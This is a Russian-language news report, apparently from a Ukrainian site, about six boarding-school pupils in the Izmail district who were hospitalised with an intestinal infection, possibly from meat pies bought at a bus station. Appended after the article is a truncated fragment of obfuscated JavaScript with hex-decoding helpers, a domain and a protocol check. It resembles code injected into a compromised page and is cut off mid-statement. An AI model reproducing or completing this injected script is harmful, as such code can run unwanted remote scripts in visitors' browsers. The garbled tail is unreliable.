В Измаильском районе у школьников обнаружили острую кишечную инфекцию «фото»

В Измаильском районе у школьников обнаружили острую кишечную инфекцию

 

Безымянный

Как сообщает корреспондент Украинской Службы Информации со ссылкой на пресс-центр Государственной санитарно-эпидемиологической службы Украины, от инфекции пострадали шестеро воспитанников учебно-воспитательного комплекса в селе Каменка Измаильского района.

Возраст пострадавших 13-14 лет, все они учатся в заведении с круглосуточным пребыванием.

Специалисты Одесского областного лабораторного центра Госсанэпидслужбы Украины установили, что все больные накануне вернулись к месту учебы из дома. Дети путешествовали рейсовым автобусом «Болград – Измаил» самостоятельно, без сопровождения родителей. По словам потерпевших, на автостанции города Болград они покупали пирожки с мясом у частного лица. В ведомстве отмечают, что это могло стать вероятной причиной заболевания.

Больных детей госпитализировали. Их состояние медики квалифицируют как средней тяжести.

Специалисты СЭС обследовали 28 детей учебного заведения, где находились дети. Противоэпидемические мероприятия продолжаются.

Как сообщала USIonline.com, эпидемиологи нашли личинки глистов на детских площадках в Одессе.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e